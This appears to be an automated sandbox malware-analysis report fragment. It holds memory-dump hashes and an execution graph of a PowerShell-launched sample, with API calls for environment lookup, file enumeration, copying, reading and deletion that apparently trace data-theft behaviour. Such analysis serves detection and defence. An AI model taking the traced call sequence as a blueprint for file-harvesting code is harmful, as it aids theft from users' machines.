                                                                    • Instruction ID: 789445021b74c3a28f469500c6143f6b4de5e90c1b9985b1ec3a1be7d62d233e
                                                                    • Opcode Fuzzy Hash: 66a908c82227a8e2c2f7f622d63ada760ecf4436a9374b2f09f7cca4127bb699
                                                                    • Instruction Fuzzy Hash: 44725CB4A00215DFD724CB18C981B69BBB3EF89314F14C199D919AB381CBB2ED91CF91
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2378630230.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7100000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4']q
                                                                    • API String ID: 0-1259897404
                                                                    • Opcode ID: 5b2eba17d66a0bf9f892ecdb5ab46994df5d2690a917a1d7d2512371bef77806
                                                                    • Instruction ID: 53b33b434714a4df4d8d7307bb02dfa12e367a80c26495a905f8e73c4660929c
                                                                    • Opcode Fuzzy Hash: 5b2eba17d66a0bf9f892ecdb5ab46994df5d2690a917a1d7d2512371bef77806
                                                                    • Instruction Fuzzy Hash: E53269B4B00215DFD7258B18C941FA9BBB3EF85714F1480A9D91A6B381CBB2ED91CF91
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2378630230.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7100000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 625b50db3d929616de7bcec82ad7969c8a694c02ecd0886de0811c6ed4a7e803
                                                                    • Instruction ID: 3fe762473fad75354c657b2068b6c72e656b239807af8dea34e7fe6feaaa8c03
                                                                    • Opcode Fuzzy Hash: 625b50db3d929616de7bcec82ad7969c8a694c02ecd0886de0811c6ed4a7e803
                                                                    • Instruction Fuzzy Hash: F6A1C174A00205DFC705CB69CA51B9ABBB2EF89354F1480A9E405AF3D6CB76EC45CBE1
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2378630230.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7100000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9998849604f78baae6de73d29fdf154e9924471c765173fca6b6f8850d3bf53b
                                                                    • Instruction ID: bbb51284ae0b4fe9775c3c2da9f79073a6f445c22e63f40e1dd08ac54fc406f4
                                                                    • Opcode Fuzzy Hash: 9998849604f78baae6de73d29fdf154e9924471c765173fca6b6f8850d3bf53b
                                                                    • Instruction Fuzzy Hash: 06919E70B002049FC714DB68CA55BAABBB6EF88354F108068E905AF3D5CB76EC41CBE1
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2378630230.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7100000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 80f18353b181aba5033e03a973c68485b60399e214855a14996d9f73ef45a8fc
                                                                    • Instruction ID: 31905f0bd80c0abdf0e258d43fae3435354a882d85d857dd8b78664721288523
                                                                    • Opcode Fuzzy Hash: 80f18353b181aba5033e03a973c68485b60399e214855a14996d9f73ef45a8fc
                                                                    • Instruction Fuzzy Hash: AF816DB0B00205DFD714CB59CA85BAABBB2EF88754F108469E505AF3D5CB76EC41CBA1
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2378630230.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7100000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 69709c7e0e18ea007e7bdce5c914e7aa4a1f240caa2eb7a4404a333adb0e0f95
                                                                    • Instruction ID: 763e79fefe7037ed65445137f06a8f5827aaa1ddb1746b6a06f1f2d6369f4216
                                                                    • Opcode Fuzzy Hash: 69709c7e0e18ea007e7bdce5c914e7aa4a1f240caa2eb7a4404a333adb0e0f95
                                                                    • Instruction Fuzzy Hash: 02318F74B402049BDB48A7A8C995BAE7EA7EFC4744F108424E9016F3D1CE7A9C42CBE1
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2378630230.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7100000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3dec18ec76ad7d28f12585297e6d3acdac20270565813484d3b4c34b1edf1877
                                                                    • Instruction ID: e7fa593d4ab7d873eaf05823763a4073b323cae77951f5661f3826c74ad9ffeb
                                                                    • Opcode Fuzzy Hash: 3dec18ec76ad7d28f12585297e6d3acdac20270565813484d3b4c34b1edf1877
                                                                    • Instruction Fuzzy Hash: A2214C71310316AFD7285ABA888073BB6D69BC9712F20843AA546CB2C0CFB5DC41D3B1
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2378630230.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7100000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1c1b0f32427bae99bf694629a71e40eb9e834019804bf648b5f61ebff5ad431c
                                                                    • Instruction ID: cbedb3474855201075d03fc4794ff711e36ae66562a3619c5126f0850b617c49
                                                                    • Opcode Fuzzy Hash: 1c1b0f32427bae99bf694629a71e40eb9e834019804bf648b5f61ebff5ad431c
                                                                    • Instruction Fuzzy Hash: 9121AD703043867FD7290A7A88807767FA69F8A711F248466E585CB2D2CBB9DD44D3B1
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2378630230.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7100000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 45db5492ee13097cf1aab68be6b9837437878e8d7407b4a3cda97bcf4fa7142c
                                                                    • Instruction ID: 7c46a5545352a1f2cdb76ecde9e092d723e1cf3745d0619431788f5f829100f5
                                                                    • Opcode Fuzzy Hash: 45db5492ee13097cf1aab68be6b9837437878e8d7407b4a3cda97bcf4fa7142c
                                                                    • Instruction Fuzzy Hash: BB01477632031A8BC72555AAD50027AB799DBC9622F14C47EE849C62D0DBB2C945C3A0
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2378630230.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7100000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f22687ba7ca6f2a03ef34aa79c629740938a4acae9c8c130dbbfa2b91bc8e8dc
                                                                    • Instruction ID: f136a7c23d017271c430452e60fc2db3a77e506d32107c37dc91185625d0d535
                                                                    • Opcode Fuzzy Hash: f22687ba7ca6f2a03ef34aa79c629740938a4acae9c8c130dbbfa2b91bc8e8dc
                                                                    • Instruction Fuzzy Hash: 28012BB1B046144BD22712780D125AD3B128FD9759B4144BAC901AF2C6CBB94D0383E3
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2360779545.0000000000B4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B4D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_b4d000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e4029322e6e41dc85a15ae6cb0a35238408b7b2e368f161f609fa0d52ffb01d8
                                                                    • Instruction ID: 20c83c556f621401b0f9b5dfe71f6047556ca964aa09106e4ab0895acd43de75
                                                                    • Opcode Fuzzy Hash: e4029322e6e41dc85a15ae6cb0a35238408b7b2e368f161f609fa0d52ffb01d8
                                                                    • Instruction Fuzzy Hash: BA012B311043009ADB208B19CDC4B67BFDCEF45324F18C4AAED480B346C2799942D6B1
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2378630230.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7100000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 18086e4892594856e7c13644352b85d82c995fe54ee6ad61eeb9895889e81021
                                                                    • Instruction ID: ba58d192e7440bc222bfddfb2c71084a6efecc4787f7625b3c8c6cf401aca4b0
                                                                    • Opcode Fuzzy Hash: 18086e4892594856e7c13644352b85d82c995fe54ee6ad61eeb9895889e81021
                                                                    • Instruction Fuzzy Hash: 98F078322283808FC3028A689900371BBB5CFCB122F1940FBD044C71E2D3A28D07C7B1
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2360779545.0000000000B4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B4D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_b4d000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b66127aa31aa6ac2414318061f8628a4919ef1c4bd8131736b8652e10594fa96
                                                                    • Instruction ID: 6ccd56abf37deef3be362fdc48fd3d6c46b415cabf91171807ec14eb1e91ba89
                                                                    • Opcode Fuzzy Hash: b66127aa31aa6ac2414318061f8628a4919ef1c4bd8131736b8652e10594fa96
                                                                    • Instruction Fuzzy Hash: FAF0C271004344AEEB108A16C984B62FFD8EF52334F18C45AED480B386C2799841CAB0
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2378630230.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7100000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 4987730b95dec03cebca21f99c8c8476d20d0cb2b41389e16b12ad208d184cd0
                                                                    • Instruction ID: 7f4af948b8d1325bc0a162cdd9c91915e1a5d8dc401a17e1b5d52b5fbfac3dad
                                                                    • Opcode Fuzzy Hash: 4987730b95dec03cebca21f99c8c8476d20d0cb2b41389e16b12ad208d184cd0
                                                                    • Instruction Fuzzy Hash: 8AF0397020A241EFD312CB20D895A56BB72AF83204B09C1CFD0548F1E7CBB6D842CBA1
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2360779545.0000000000B4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B4D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_b4d000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e65cd4feed42e44697013ea2ef8c0be318f5e1ca30ed618e0ee6cd4f1a14e70a
                                                                    • Instruction ID: a5fed7af5210aa150f94a6274f84a016c14078fa51deee17d354c11e628bfe36
                                                                    • Opcode Fuzzy Hash: e65cd4feed42e44697013ea2ef8c0be318f5e1ca30ed618e0ee6cd4f1a14e70a
                                                                    • Instruction Fuzzy Hash: 5D213772604204DFDF05DF14D9C0F26BFA5FB98324F2485A9E9090B256C33ADD56EBA2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2378630230.0000000007100000.00000040.00000800.00020000.00000000.sdmp, Offset: 07100000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7100000_powershell.jbxd

Execution Graph

Execution Coverage: 1.9%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 2.7%
Total number of Nodes: 1628
Total number of Limit Nodes: 1
7905 234b7ab3 7904->7905 7906 234b637b _abort 20 API calls 7905->7906 7910 234b7ad9 7905->7910 7907 234b7acd 7906->7907 7909 234b571e _free 20 API calls 7907->7909 7908 234b5eb7 11 API calls 7908->7910 7909->7910 7910->7908 7911 234b7ae5 7910->7911 6845 234b7bc7 6846 234b7bd3 ___DestructExceptionObject 6845->6846 6848 234b7c0a _abort 6846->6848 6853 234b5671 RtlEnterCriticalSection 6846->6853 6849 234b7be7 6854 234b7f86 6849->6854 6853->6849 6855 234b7f94 __fassign 6854->6855 6857 234b7bf7 6854->6857 6855->6857 6861 234b7cc2 6855->6861 6858 234b7c10 6857->6858 6975 234b56b9 RtlLeaveCriticalSection 6858->6975 6860 234b7c17 6860->6848 6862 234b7d42 6861->6862 6864 234b7cd8 6861->6864 6865 234b571e _free 20 API calls 6862->6865 6887 234b7d90 6862->6887 6864->6862 6866 234b7d0b 6864->6866 6871 234b571e _free 20 API calls 6864->6871 6867 234b7d64 6865->6867 6868 234b7d2d 6866->6868 6877 234b571e _free 20 API calls 6866->6877 6869 234b571e _free 20 API calls 6867->6869 6870 234b571e _free 20 API calls 6868->6870 6872 234b7d77 6869->6872 6873 234b7d37 6870->6873 6875 234b7d00 6871->6875 6878 234b571e _free 20 API calls 6872->6878 6881 234b571e _free 20 API calls 6873->6881 6874 234b7dfe 6882 234b571e _free 20 API calls 6874->6882 6889 234b90ba 6875->6889 6876 234b7d9e 6876->6874 6888 234b571e 20 API calls _free 6876->6888 6879 234b7d22 6877->6879 6880 234b7d85 6878->6880 6917 234b91b8 6879->6917 6885 234b571e _free 20 API calls 6880->6885 6881->6862 6886 234b7e04 6882->6886 6885->6887 6886->6857 6929 234b7e35 6887->6929 6888->6876 6890 234b90cb 6889->6890 6916 234b91b4 6889->6916 6891 234b90dc 6890->6891 6892 234b571e _free 20 API calls 6890->6892 6893 234b571e _free 20 API calls 6891->6893 6897 234b90ee 6891->6897 6892->6891 6893->6897 6894 234b9100 6896 234b9112 6894->6896 6898 234b571e _free 20 API calls 6894->6898 6895 234b571e _free 20 API calls 6895->6894 6899 234b9124 6896->6899 6900 234b571e _free 20 API calls 6896->6900 6897->6894 6897->6895 6898->6896 6901 
234b9136 6899->6901 6902 234b571e _free 20 API calls 6899->6902 6900->6899 6903 234b9148 6901->6903 6904 234b571e _free 20 API calls 6901->6904 6902->6901 6905 234b915a 6903->6905 6906 234b571e _free 20 API calls 6903->6906 6904->6903 6907 234b916c 6905->6907 6908 234b571e _free 20 API calls 6905->6908 6906->6905 6909 234b917e 6907->6909 6910 234b571e _free 20 API calls 6907->6910 6908->6907 6911 234b9190 6909->6911 6912 234b571e _free 20 API calls 6909->6912 6910->6909 6913 234b91a2 6911->6913 6914 234b571e _free 20 API calls 6911->6914 6912->6911 6915 234b571e _free 20 API calls 6913->6915 6913->6916 6914->6913 6915->6916 6916->6866 6918 234b91c5 6917->6918 6928 234b921d 6917->6928 6919 234b91d5 6918->6919 6921 234b571e _free 20 API calls 6918->6921 6920 234b91e7 6919->6920 6922 234b571e _free 20 API calls 6919->6922 6923 234b91f9 6920->6923 6924 234b571e _free 20 API calls 6920->6924 6921->6919 6922->6920 6925 234b920b 6923->6925 6926 234b571e _free 20 API calls 6923->6926 6924->6923 6927 234b571e _free 20 API calls 6925->6927 6925->6928 6926->6925 6927->6928 6928->6868 6930 234b7e60 6929->6930 6931 234b7e42 6929->6931 6930->6876 6931->6930 6935 234b925d 6931->6935 6934 234b571e _free 20 API calls 6934->6930 6936 234b7e5a 6935->6936 6937 234b926e 6935->6937 6936->6934 6971 234b9221 6937->6971 6940 234b9221 __fassign 20 API calls 6941 234b9281 6940->6941 6942 234b9221 __fassign 20 API calls 6941->6942 6943 234b928c 6942->6943 6944 234b9221 __fassign 20 API calls 6943->6944 6945 234b9297 6944->6945 6946 234b9221 __fassign 20 API calls 6945->6946 6947 234b92a5 6946->6947 6948 234b571e _free 20 API calls 6947->6948 6949 234b92b0 6948->6949 6950 234b571e _free 20 API calls 6949->6950 6951 234b92bb 6950->6951 6952 234b571e _free 20 API calls 6951->6952 6953 234b92c6 6952->6953 6954 234b9221 __fassign 20 API calls 6953->6954 6955 234b92d4 6954->6955 6956 234b9221 __fassign 20 API calls 6955->6956 6957 234b92e2 6956->6957 6958 234b9221 __fassign 20 API calls 6957->6958 
6959 234b92f3 6958->6959 6960 234b9221 __fassign 20 API calls 6959->6960 6961 234b9301 6960->6961 6962 234b9221 __fassign 20 API calls 6961->6962 6963 234b930f 6962->6963 6964 234b571e _free 20 API calls 6963->6964 6965 234b931a 6964->6965 6966 234b571e _free 20 API calls 6965->6966 6967 234b9325 6966->6967 6968 234b571e _free 20 API calls 6967->6968 6969 234b9330 6968->6969 6970 234b571e _free 20 API calls 6969->6970 6970->6936 6972 234b9258 6971->6972 6974 234b9248 6971->6974 6972->6940 6973 234b571e _free 20 API calls 6973->6974 6974->6972 6974->6973 6975->6860 6976 234ba1c6 IsProcessorFeaturePresent 6648 234ba945 6650 234ba96d 6648->6650 6649 234ba9a5 6650->6649 6651 234ba99e 6650->6651 6652 234ba997 6650->6652 6661 234baa00 6651->6661 6657 234baa17 6652->6657 6658 234baa20 6657->6658 6665 234bb19b 6658->6665 6662 234baa20 6661->6662 6663 234bb19b __startOneArgErrorHandling 21 API calls 6662->6663 6664 234ba9a3 6663->6664 6666 234bb1da __startOneArgErrorHandling 6665->6666 6669 234bb25c __startOneArgErrorHandling 6666->6669 6675 234bb59e 6666->6675 6673 234bb286 6669->6673 6678 234b78a3 6669->6678 6670 234bb292 6672 234b2ada _ValidateLocalCookies 5 API calls 6670->6672 6674 234ba99c 6672->6674 6673->6670 6682 234bb8b2 6673->6682 6689 234bb5c1 6675->6689 6679 234b78cb 6678->6679 6680 234b2ada _ValidateLocalCookies 5 API calls 6679->6680 6681 234b78e8 6680->6681 6681->6673 6683 234bb8bf 6682->6683 6684 234bb8d4 6682->6684 6685 234bb8d9 6683->6685 6687 234b6368 _free 20 API calls 6683->6687 6686 234b6368 _free 20 API calls 6684->6686 6685->6670 6686->6685 6688 234bb8cc 6687->6688 6688->6670 6690 234bb5ec __raise_exc 6689->6690 6691 234bb7e5 RaiseException 6690->6691 6692 234bb5bc 6691->6692 6692->6669 5943 234b1c5b 5944 234b1c6b ___scrt_fastfail 5943->5944 5947 234b12ee 5944->5947 5946 234b1c87 5948 234b1324 ___scrt_fastfail 5947->5948 5949 234b13b7 GetEnvironmentVariableW 5948->5949 5973 234b10f1 5949->5973 5952 234b10f1 57 API calls 5953 234b1465 5952->5953 5954 
234b10f1 57 API calls 5953->5954 5955 234b1479 5954->5955 5956 234b10f1 57 API calls 5955->5956 5957 234b148d 5956->5957 5958 234b10f1 57 API calls 5957->5958 5959 234b14a1 5958->5959 5960 234b10f1 57 API calls 5959->5960 5961 234b14b5 lstrlenW 5960->5961 5962 234b14d9 lstrlenW 5961->5962 5963 234b14d2 5961->5963 5964 234b10f1 57 API calls 5962->5964 5963->5946 5965 234b1501 lstrlenW lstrcatW 5964->5965 5966 234b10f1 57 API calls 5965->5966 5967 234b1539 lstrlenW lstrcatW 5966->5967 5968 234b10f1 57 API calls 5967->5968 5969 234b156b lstrlenW lstrcatW 5968->5969 5970 234b10f1 57 API calls 5969->5970 5971 234b159d lstrlenW lstrcatW 5970->5971 5972 234b10f1 57 API calls 5971->5972 5972->5963 5974 234b1118 ___scrt_fastfail 5973->5974 5975 234b1129 lstrlenW 5974->5975 5986 234b2c40 5975->5986 5978 234b1168 lstrlenW 5979 234b1177 lstrlenW FindFirstFileW 5978->5979 5980 234b11e1 5979->5980 5981 234b11a0 5979->5981 5980->5952 5982 234b11aa 5981->5982 5983 234b11c7 FindNextFileW 5981->5983 5982->5983 5988 234b1000 5982->5988 5983->5981 5985 234b11da FindClose 5983->5985 5985->5980 5987 234b1148 lstrcatW lstrlenW 5986->5987 5987->5978 5987->5979 5989 234b1022 ___scrt_fastfail 5988->5989 5990 234b10af 5989->5990 5991 234b102f lstrcatW lstrlenW 5989->5991 5992 234b10b5 lstrlenW 5990->5992 6003 234b10ad 5990->6003 5993 234b106b lstrlenW 5991->5993 5994 234b105a lstrlenW 5991->5994 6019 234b1e16 5992->6019 6005 234b1e89 lstrlenW 5993->6005 5994->5993 5997 234b10ca 6000 234b1e89 5 API calls 5997->6000 5997->6003 5998 234b1088 GetFileAttributesW 5999 234b109c 5998->5999 5998->6003 5999->6003 6011 234b173a 5999->6011 6002 234b10df 6000->6002 6024 234b11ea 6002->6024 6003->5982 6006 234b2c40 ___scrt_fastfail 6005->6006 6007 234b1ea7 lstrcatW lstrlenW 6006->6007 6008 234b1ec2 6007->6008 6009 234b1ed1 lstrcatW 6007->6009 6008->6009 6010 234b1ec7 lstrlenW 6008->6010 6009->5998 6010->6009 6012 234b1747 ___scrt_fastfail 6011->6012 6039 234b1cca 6012->6039 6016 234b199f 6016->6003 6017 
234b1824 ___scrt_fastfail _strlen 6017->6016 6059 234b15da 6017->6059 6020 234b1e29 6019->6020 6023 234b1e4c 6019->6023 6021 234b1e2d lstrlenW 6020->6021 6020->6023 6022 234b1e3f lstrlenW 6021->6022 6021->6023 6022->6023 6023->5997 6025 234b120e ___scrt_fastfail 6024->6025 6026 234b1e89 5 API calls 6025->6026 6027 234b1220 GetFileAttributesW 6026->6027 6028 234b1246 6027->6028 6029 234b1235 6027->6029 6030 234b1e89 5 API calls 6028->6030 6029->6028 6031 234b173a 35 API calls 6029->6031 6032 234b1258 6030->6032 6031->6028 6033 234b10f1 56 API calls 6032->6033 6034 234b126d 6033->6034 6035 234b1e89 5 API calls 6034->6035 6036 234b127f ___scrt_fastfail 6035->6036 6037 234b10f1 56 API calls 6036->6037 6038 234b12e6 6037->6038 6038->6003 6040 234b1cf1 ___scrt_fastfail 6039->6040 6041 234b1d0f CopyFileW CreateFileW 6040->6041 6042 234b1d55 GetFileSize 6041->6042 6043 234b1d44 DeleteFileW 6041->6043 6044 234b1ede 22 API calls 6042->6044 6048 234b1808 6043->6048 6045 234b1d66 ReadFile 6044->6045 6046 234b1d7d CloseHandle DeleteFileW 6045->6046 6047 234b1d94 CloseHandle DeleteFileW 6045->6047 6046->6048 6047->6048 6048->6016 6049 234b1ede 6048->6049 6051 234b222f 6049->6051 6052 234b224e 6051->6052 6054 234b2250 6051->6054 6067 234b474f 6051->6067 6072 234b47e5 6051->6072 6052->6017 6055 234b2908 6054->6055 6079 234b35d2 6054->6079 6056 234b35d2 __CxxThrowException@8 RaiseException 6055->6056 6058 234b2925 6056->6058 6058->6017 6060 234b160c _strcat _strlen 6059->6060 6061 234b163c lstrlenW 6060->6061 6167 234b1c9d 6061->6167 6063 234b1655 lstrcatW lstrlenW 6064 234b1678 6063->6064 6065 234b167e lstrcatW 6064->6065 6066 234b1693 ___scrt_fastfail 6064->6066 6065->6066 6066->6017 6082 234b4793 6067->6082 6070 234b478f 6070->6051 6071 234b4765 6088 234b2ada 6071->6088 6078 234b56d0 _abort 6072->6078 6073 234b570e 6101 234b6368 6073->6101 6075 234b56f9 RtlAllocateHeap 6076 234b570c 6075->6076 6075->6078 6076->6051 6077 234b474f _abort 7 API calls 6077->6078 6078->6073 
6078->6075 6078->6077 6080 234b35f2 RaiseException 6079->6080 6080->6055 6083 234b479f ___DestructExceptionObject 6082->6083 6095 234b5671 RtlEnterCriticalSection 6083->6095 6085 234b47aa 6096 234b47dc 6085->6096 6087 234b47d1 _abort 6087->6071 6089 234b2ae3 6088->6089 6090 234b2ae5 IsProcessorFeaturePresent 6088->6090 6089->6070 6092 234b2b58 6090->6092 6100 234b2b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 6092->6100 6094 234b2c3b 6094->6070 6095->6085 6099 234b56b9 RtlLeaveCriticalSection 6096->6099 6098 234b47e3 6098->6087 6099->6098 6100->6094 6104 234b5b7a GetLastError 6101->6104 6105 234b5b93 6104->6105 6108 234b5b99 6104->6108 6123 234b5e08 6105->6123 6110 234b5bf0 SetLastError 6108->6110 6130 234b637b 6108->6130 6113 234b5bf9 6110->6113 6111 234b5bb3 6137 234b571e 6111->6137 6113->6076 6116 234b5bcf 6150 234b593c 6116->6150 6117 234b5bb9 6119 234b5be7 SetLastError 6117->6119 6119->6113 6121 234b571e _free 17 API calls 6122 234b5be0 6121->6122 6122->6110 6122->6119 6155 234b5c45 6123->6155 6125 234b5e2f 6126 234b5e47 TlsGetValue 6125->6126 6127 234b5e3b 6125->6127 6126->6127 6128 234b2ada _ValidateLocalCookies 5 API calls 6127->6128 6129 234b5e58 6128->6129 6129->6108 6135 234b6388 _abort 6130->6135 6131 234b63c8 6133 234b6368 _free 19 API calls 6131->6133 6132 234b63b3 RtlAllocateHeap 6134 234b5bab 6132->6134 6132->6135 6133->6134 6134->6111 6143 234b5e5e 6134->6143 6135->6131 6135->6132 6136 234b474f _abort 7 API calls 6135->6136 6136->6135 6138 234b5729 HeapFree 6137->6138 6142 234b5752 _free 6137->6142 6139 234b573e 6138->6139 6138->6142 6140 234b6368 _free 18 API calls 6139->6140 6141 234b5744 GetLastError 6140->6141 6141->6142 6142->6117 6144 234b5c45 _abort 5 API calls 6143->6144 6145 234b5e85 6144->6145 6146 234b5ea0 TlsSetValue 6145->6146 6147 234b5e94 6145->6147 6146->6147 6148 234b2ada _ValidateLocalCookies 5 API calls 6147->6148 6149 234b5bc8 6148->6149 6149->6111 6149->6116 6161 234b5914 6150->6161 
6156 234b5c75 __crt_fast_encode_pointer 6155->6156 6157 234b5c71 6155->6157 6156->6125 6157->6156 6158 234b5ce1 _abort LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary 6157->6158 6160 234b5c95 6157->6160 6158->6157 6159 234b5ca1 GetProcAddress 6159->6156 6160->6156 6160->6159 6162 234b5854 _abort RtlEnterCriticalSection RtlLeaveCriticalSection 6161->6162 6163 234b5938 6162->6163 6164 234b58c4 6163->6164 6165 234b5758 _abort 20 API calls 6164->6165 6166 234b58e8 6165->6166 6166->6121 6168 234b1ca6 _strlen 6167->6168 6168->6063 7702 234b20db 7705 234b20e7 ___DestructExceptionObject 7702->7705 7703 234b20f6 7704 234b2110 dllmain_raw 7704->7703 7706 234b212a 7704->7706 7705->7703 7705->7704 7708 234b210b 7705->7708 7715 234b1eec 7706->7715 7708->7703 7709 234b2177 7708->7709 7712 234b1eec 31 API calls 7708->7712 7709->7703 7710 234b1eec 31 API calls 7709->7710 7711 234b218a 7710->7711 7711->7703 7713 234b2193 dllmain_raw 7711->7713 7714 234b216d dllmain_raw 7712->7714 7713->7703 7714->7709 7716 234b1f2a dllmain_crt_process_detach 7715->7716 7717 234b1ef7 7715->7717 7724 234b1f06 7716->7724 7718 234b1f1c dllmain_crt_process_attach 7717->7718 7719 234b1efc 7717->7719 7718->7724 7720 234b1f12 7719->7720 7721 234b1f01 7719->7721 7730 234b23ec 7720->7730 7721->7724 7725 234b240b 7721->7725 7724->7708 7738 234b53e5 7725->7738 7831 234b3513 7730->7831 7735 234b2408 7735->7724 7736 234b351e 7 API calls 7737 234b23f5 7736->7737 7737->7724 7744 234b5aca 7738->7744 7741 234b351e 7820 234b3820 7741->7820 7743 234b2415 7743->7724 7745 234b2410 7744->7745 7746 234b5ad4 7744->7746 7745->7741 7747 234b5e08 _abort 11 API calls 7746->7747 7748 234b5adb 7747->7748 7748->7745 7749 234b5e5e _abort 11 API calls 7748->7749 7750 234b5aee 7749->7750 7752 234b59b5 7750->7752 7753 234b59d0 7752->7753 7754 234b59c0 7752->7754 7753->7745 7758 234b59d6 7754->7758 7757 234b571e _free 20 API calls 7757->7753 7759 234b59e9 7758->7759 7762 234b59ef 7758->7762 7760 234b571e _free 20 API calls 
